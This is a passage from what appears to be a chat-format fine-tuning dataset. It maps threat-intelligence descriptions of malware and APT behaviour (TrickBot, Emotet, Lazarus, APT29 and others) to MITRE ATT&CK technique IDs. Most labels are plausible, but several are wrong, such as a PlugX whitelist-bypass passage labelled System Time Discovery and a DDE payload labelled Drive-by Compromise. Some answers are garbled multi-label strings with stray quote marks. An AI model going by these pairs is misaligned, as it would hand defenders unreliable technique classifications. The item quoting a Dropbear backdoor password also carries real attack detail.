"user", "content": "TrickBot has used \"Nt*\" Native API functions to inject code into legitimate processes such as \"wermgr.exe\"." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can enumerate the IP address of a compromised machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running \"ls -la ~/Library/Application\\ Support/MobileSync/Backup/\"." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns" }, { "role": "assistant", "content": "T1106 - Native API', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1120 - Peripheral Device Discovery', 'T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 4 – Backdoored authentication function in SSH server As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered" }, { "role": "assistant", "content": "T1021 - Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot has obfuscated scripts used in execution." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer can exfiltrate data over actor-controlled C2 servers via HTTP or TCP." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors discovered network disks mounted to the system using netstat." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An Port 22 malware variant registers itself as a service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkComet can listen in to victims' conversations through the system’s microphone." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pony attachments have been delivered via compressed archive files. Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While Emotet has been around for many years and is one of the most well-known pieces of malware in the wild, that doesn't mean attackers don't try to freshen it up. These new campaigns have been observed following a period of relatively low Emotet distribution activity, corresponding with the observance of Orthodox Christmas in certain geographic regions. These new malicious efforts involve sending victims malicious Microsoft Word attachments with embedded macros that download Emotet. This latest strain has also gained the ability to check if the infected IP where the malicious email is being sent from is already blocklisted on a spam list" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses." }, { "role": "assistant", "content": "T1216.001 - Signed Script Proxy Execution: Pubprn" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ObliqueRAT can capture a screenshot of the current screen." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 has registered hundreds of domains for use in operations." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop can make modifications to Registry keys." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UPPERCUT has the capability to obtain the time zone information and current timestamp of the victim’s machine." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuietSieve can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS)." }, { "role": "assistant", "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In another case the attackers use another code snippet borrowed from the SubTee GitHub project, this time filling in a fully templated .NET application whitelist bypass file: SHA256: 3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2: This time the attacker didn’t have to write any of their own code, instead they were simply able to paste their shellcode directly into a template, in order to launch PlugX as a child process of a trusted application" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The link provided in the malicious email led to a fake VPN Web Portal: Upon logging in with the credentials provided in the email, the victim is presented with the following page: The victim is asked to install the “VPN Client” (an .exe file), or, if download fails, to download a password protected zip (with the same .exe file inside)" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used the Windows API to execute code within a victim's system." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "nbtstat can be used to discover local NetBIOS domain names." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Enabling the macros starts a multi-stage infection chain that eventually downloads and executes a Cobalt Strike beacon, providing the attackers with a foothold inside the target organization." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can identify the geographical location of a victim host." }, { "role": "assistant", "content": "T1614 - System Location Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used multiple types of scripting for execution, including JavaScript, JavaScript Scriptlets in XML, and VBScript." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It’s also used to inject code into its target processes using the technique." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can use winapiexec tool for indirect execution of \"ShellExecuteW\" and \"CreateProcessA\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type network traffic can communicate over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used NTDSDump and other password dumping tools to gather credentials." }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE uses the command prompt to execute commands on the victim's machine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects network adapter and interface information by using the commands ipconfig /all, arp -a and route print. It also collects the system's MAC address with getmac and domain configuration with net config workstation." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp, which differs from the Zebrocy downloader delivered in the February 2018 attacks" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Microsoft has been monitoring these attacks and notifying targeted customers for several months, but only recently reached a point in our investigation where we can attribute the activity to Strontium with high confidence. MSTIC’s investigation revealed that Strontium has evolved its tactics since the 2016 election to include new reconnaissance tools and new techniques to obfuscate their operations. In recent months, it has engaged in brute force attacks and password spray, two tactics that have likely allowed them to automate aspects of their operations. Strontium also disguised these credential harvesting attacks in new ways, running them through more than 1,000 constantly rotating IP addresses, many associated with the Tor anonymizing service. Strontium even evolved its infrastructure over time, adding and removing about 20 IPs per day to further mask its activity" }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USBferry can use \"netstat\" and \"nbtstat\" to detect active network connections." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors used a modified and obfuscated version of the reGeorg web shell to maintain persistent access on a target's Outlook Web Access (OWA® ) server." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. This technique takes advantage of the fact that Windows does not require an application to provide a specific path for a DLL that it wishes to load. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor’s component may be run with elevated privileges" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Modifying the Standard Information timestamps (created, modified, accessed) of every downloaded executable to match a randomly selected file from the System32 directory that was created prior to 2013" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has created accounts disguised as legitimate backup and service accounts as well as an email administration account." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns" }, { "role": "assistant", "content": "T1584.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee has batch files that modify the system service COMSysApp to load a malicious DLL." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used VBScript to drop and execute malware loaders." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IndigoZebra has downloaded additional files and tools from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. The document’s metadata used in this campaign links them to several other documents used by this actor in the past" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JPIN can inject content into lsass.exe to load a module." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy will attempt to detect anti-virus products during the initial infection." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can utilize built-in modules to modify service binaries and restore them to their original state." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpicyOmelette can identify the IP of a compromised system." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSInfo enumerates local and domain users" }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware can be instructed to search for recently-used documents or other interesting files. It can monitor specific directories and removable devices, report any changes and exfiltrate files of the attackers’ choice" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some strings in HOMEFRY are obfuscated with XOR x56." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY has the ability to set its window state to hidden." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates with its C2 server over HTTPS." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally the script deletes the shadow copies, in a preparation for the ransomware operations." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil)." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of writing a file to the compromised system from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda encrypts strings with XOR and obfuscates the macro code from the initial payload. Zeus Panda also encrypts all configuration and settings in AES and RC4." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca collected information on user accounts via the \"whoami\" command." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum was seen using NetSess to discover NetBIOS sessions." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE has been executed through luring victims into opening malicious documents." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Based upon the instructional guide and the provided tools, this package appears consistent with the methodologies FireEye outlined in their research on how these attacks were executed, including specific details such as the use of ICAP via a proxy passthrough, in this case specifically squid, and using certbot to create a Let’s Encrypt SSL certificate" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has stopped services related to anti-virus." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use DDE to execute additional payloads on compromised hosts." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After executing the sample, we noticed the sample copied itself to a hidden folder and launched from the hidden folder. This is a good first step to hide itself from casual observation on disk" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLUELIGHT can download additional files onto the host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The 2019 Linux variant of the GoldMax backdoor is almost identical in functionality and implementation to the previously identified May 2020 Windows variant. The very few additions to the backdoor between 2019 and 2020 likely reflect its maturity and longstanding evasion of detections. It is likely GoldMax has been used as a long-term persistence backdoor during StellarParticle-related compromises, which would be consistent with the few changes made to the malware to modify existing functions or support additional functionality." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wingbird drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes." }, { "role": "assistant", "content": "T1547.008 - Boot or Logon Autostart Execution: LSASS Driver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has encrypted and encoded data in its malware, including by using base64." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SharpStage has used a legitimate web service for evading detection." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic can download files off the target system to send back to the server." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download and execute files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "httpclient opens cmd.exe on the victim." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2." }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE can execute \"ProcessList\" for process discovery." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: 